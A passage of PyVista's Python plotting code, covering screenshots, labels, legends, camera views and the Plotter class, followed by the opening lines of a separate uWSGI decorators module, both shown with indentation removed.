self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, loc=loc, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imagio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file."""
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
@property
def window_size(self):
"""Return the render window size."""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float
Fill value for points in image that don't include objects in scene.
To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool
Reset the camera clipping range to include data in view?
Return
------
image_depth : numpy.ndarray
Image of depth values from camera orthogonal to image plane
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image_depth'):
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.GetClippingRange()
if self.camera.GetParallelProjection():
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
args = np.logical_or(zval < -far, np.isclose(zval, -far))
self._image_depth_null = args
if fill_value is not None:
zval[args] = fill_value
return zval
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
@property
def image(self):
"""Return an image array of current render window."""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
def enable_eye_dome_lighting(self):
"""Enable eye dome lighting (EDL) for the active renderer."""
return self.renderer.enable_eye_dome_lighting()
def disable_eye_dome_lighting(self):
"""Disable eye dome lighting (EDL) for the active renderer."""
return self.renderer.disable_eye_dome_lighting()
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
self.scalar_bar = vtk.vtkActor()
self.scalar_bar.SetMapper(mapper)
self.scalar_bar.GetProperty().SetLineWidth(width)
self.scalar_bar.GetProperty().EdgeVisibilityOn()
self.scalar_bar.GetProperty().SetEdgeColor(rgb_color)
self.scalar_bar.GetProperty().SetColor(rgb_color)
self.scalar_bar.GetProperty().LightingOff()
# Add to renderer
self.add_actor(self.scalar_bar, reset_camera=False, name=name, pickable=False)
return self.scalar_bar
def remove_scalar_bar(self):
"""Remove the scalar bar."""
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
tolerance : float
a tolerance to use to determine whether a point label is visible.
A tolerance is usually required because the conversion from world
space to display space during rendering introduces numerical
round-off.
Return
------
labelMapper : vtk.vtkvtkLabeledDataMapper
VTK label mapper. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError('Points type not usable: {}'.format(type(points)))
if len(vtkpoints.points) != len(labels):
raise Exception('There must be one label for each point')
if name is None:
name = '{}({})'.format(type(vtkpoints).__name__, str(hex(id(vtkpoints))))
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Only show visible points
vis_points = vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetInputConnection(vis_points.GetOutputPort())
hier.SetLabelArrayName('labels')
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() in 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() in 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise RuntimeError('Shape ({}) not understood'.format(shape))
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor('{}-points'.format(name), reset_camera=False)
self.remove_actor('{}-labels'.format(name), reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name='{}-points'.format(name),
pickable=pickable,
render_points_as_spheres=render_points_as_spheres)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name='{}-labels'.format(name), pickable=False)
return labelMapper
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
"""
if not is_pyvista_dataset(points):
raise TypeError('input points must be a pyvista dataset, not: {}'.format(type(points)))
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = '{} {}'.format(preamble, '%.3e')
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh."""
kwargs['style'] = 'points'
self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to plotting object."""
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Save a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
supported_formats = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
if isinstance(filename, str):
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
if not any([filename.lower().endswith(ext) for ext in supported_formats]):
filename += ".png"
filename = os.path.abspath(os.path.expanduser(filename))
w = imageio.imwrite(filename, image)
if not return_img:
return w
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
The supported formats are: '.svg', '.eps', '.ps', '.pdf', '.tex'
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
valid = ['.svg', '.eps', '.ps', '.pdf', '.tex']
if extension not in valid:
raise RuntimeError('Extension ({}) is an invalid choice. Valid options include: {}'.format(extension, ', '.join(valid)))
writer = vtk.vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
return
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Return
------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(self, Plotter):
# TODO: we need a consistent rendering function
self.render()
else:
self._render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""Add a legend to render window.
Entries must be a list containing one string and color entry for each
item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n'
'Add labels to individual items when adding them to'
'the plotting object with the "label=" parameter. '
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderers[self._active_renderer_index].camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderers[self._active_renderer_index].camera_position = camera_location
def reset_camera(self):
"""Reset the camera of the active render window.
The camera slides along the vector defined from camera position to focal point
until all of the actors can be seen.
"""
self.renderers[self._active_renderer_index].reset_camera()
self._render()
def isometric_view(self):
"""Reset the camera to a default isometric view.
DEPRECATED: Please use ``view_isometric``.
"""
return self.view_isometric()
def view_isometric(self, negative=False):
"""Reset the camera to a default isometric view.
The view will show all the actors in the scene.
"""
return self.renderer.view_isometric(negative=negative)
def view_vector(self, vector, viewup=None):
"""Set the view vector."""
return self.renderer.view_vector(vector, viewup=viewup)
def view_xy(self, negative=False):
"""View the XY plane."""
return self.renderer.view_xy(negative=negative)
def view_yx(self, negative=False):
"""View the YX plane."""
return self.renderer.view_yx(negative=negative)
def view_xz(self, negative=False):
"""View the XZ plane."""
return self.renderer.view_xz(negative=negative)
def view_zx(self, negative=False):
"""View the ZX plane."""
return self.renderer.view_zx(negative=negative)
def view_yz(self, negative=False):
"""View the YZ plane."""
return self.renderer.view_yz(negative=negative)
def view_zy(self, negative=False):
"""View the ZY plane."""
return self.renderer.view_zy(negative=negative)
def disable(self):
"""Disable this renderer's camera from being interactive."""
return self.renderer.disable()
def enable(self):
"""Enable this renderer's camera to be interactive."""
return self.renderer.enable()
def set_background(self, color, loc='all', top=None):
"""Set the background color.
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
loc : int, tuple, list, or str, optional
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If ``loc='all'`` then all
render windows will have their background set.
top : string or 3 item list, optional, defaults to None
If given, this will enable a gradient background where the
``color`` argument is at the bottom and the color given in ``top``
will be the color at the top of the renderer.
"""
if color is None:
color = rcParams['background']
use_gradient = False
if top is not None:
use_gradient = True
if loc == 'all':
for renderer in self.renderers:
renderer.SetBackground(parse_color(color))
if use_gradient:
renderer.GradientBackgroundOn()
renderer.SetBackground2(parse_color(top))
else:
renderer.GradientBackgroundOff()
else:
renderer = self.renderers[self.loc_to_index(loc)]
renderer.SetBackground(parse_color(color))
if use_gradient:
renderer.GradientBackgroundOn()
renderer.SetBackground2(parse_color(top))
else:
renderer.GradientBackgroundOff()
@property
def background_color(self):
"""Return the background color of the first render window."""
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
def remove_legend(self):
"""Remove the legend actor."""
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self._render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float
A scaling factor when biulding the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
bkg=True, write_frames=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel
focus : list(float) of length 3, optional
The point of focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Define the internal thread for running the orbit."""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
self._render()
if bkg:
time.sleep(step)
if write_frames:
self.write_frame()
if bkg and isinstance(self, pyvista.BackgroundPlotter):
thread = Thread(target=orbit)
thread.start()
else:
bkg = False
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format."""
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtk.vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
self.close()
self.deep_clean()
del self.renderers
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when False. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render window.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smothing
point_smoothing : bool
If True, enable point smothing
polygon_smoothing : bool
If True, enable polygon smothing
"""
last_update_time = 0.0
q_pressed = False
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None):
"""Initialize a vtk plotting object."""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
splitting_position=splitting_position,
title=title)
log.debug('Initializing')
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self.iren.AddObserver("KeyPressEvent", self.key_press_event)
self.update_style()
# for renderer in self.renderers:
# self.iren.SetRenderWindow(renderer)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
if hasattr(self, 'iren'):
self.iren.AddObserver(vtk.vtkCommand.TimerEvent, on_timer)
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""Create a plotting window.
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update: bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call Update() in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Return
------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
# reset unless camera for the first render unless camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
# if full_screen:
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.ren_win.Render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
disp = None
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# NOTE: after this point, nothing from the render window can be accessed
# as if a user presed the close button, then it destroys the
# the render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support mult-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1,1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
"""Create a plotting window.
Present for backwards compatibility.
DEPRECATED: Please use `show()` instead.
"""
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
def render(self):
"""Render the main window."""
self.ren_win.Render()
|
uwsgidecorators.py
|
from functools import partial
import sys
from threading import Thread
try:
import cPickle as pickle
except:
import pickle
import uwsgi
if uwsgi.masterpid() == 0:
raise Exception(
"you have to enable the uWSGI master process to use this module")
spooler_functions = {}
mule_functions = {}
postfork_chain = []
# Python3 compatibility
def _encode1(val):
if sys.version_info >= (3, 0) and isinstance(val, str):
return val.encode('utf-8')
else:
return val
def _decode1(val):
if sys.version_info >= (3, 0) and isinstance(val, bytes):
return val.decode('utf-8')
else:
return val
def _encode_to_spooler(vars):
return dict((_encode1(K), _encode1(V)) for (K, V) in vars.items())
def _decode_from_spooler(vars):
return dict((_decode1(K), _decode1(V)) for (K, V) in vars.items())
def get_free_signal():
for signum in range(0, 256):
if not uwsgi.signal_registered(signum):
return signum
raise Exception("No free uwsgi signal available")
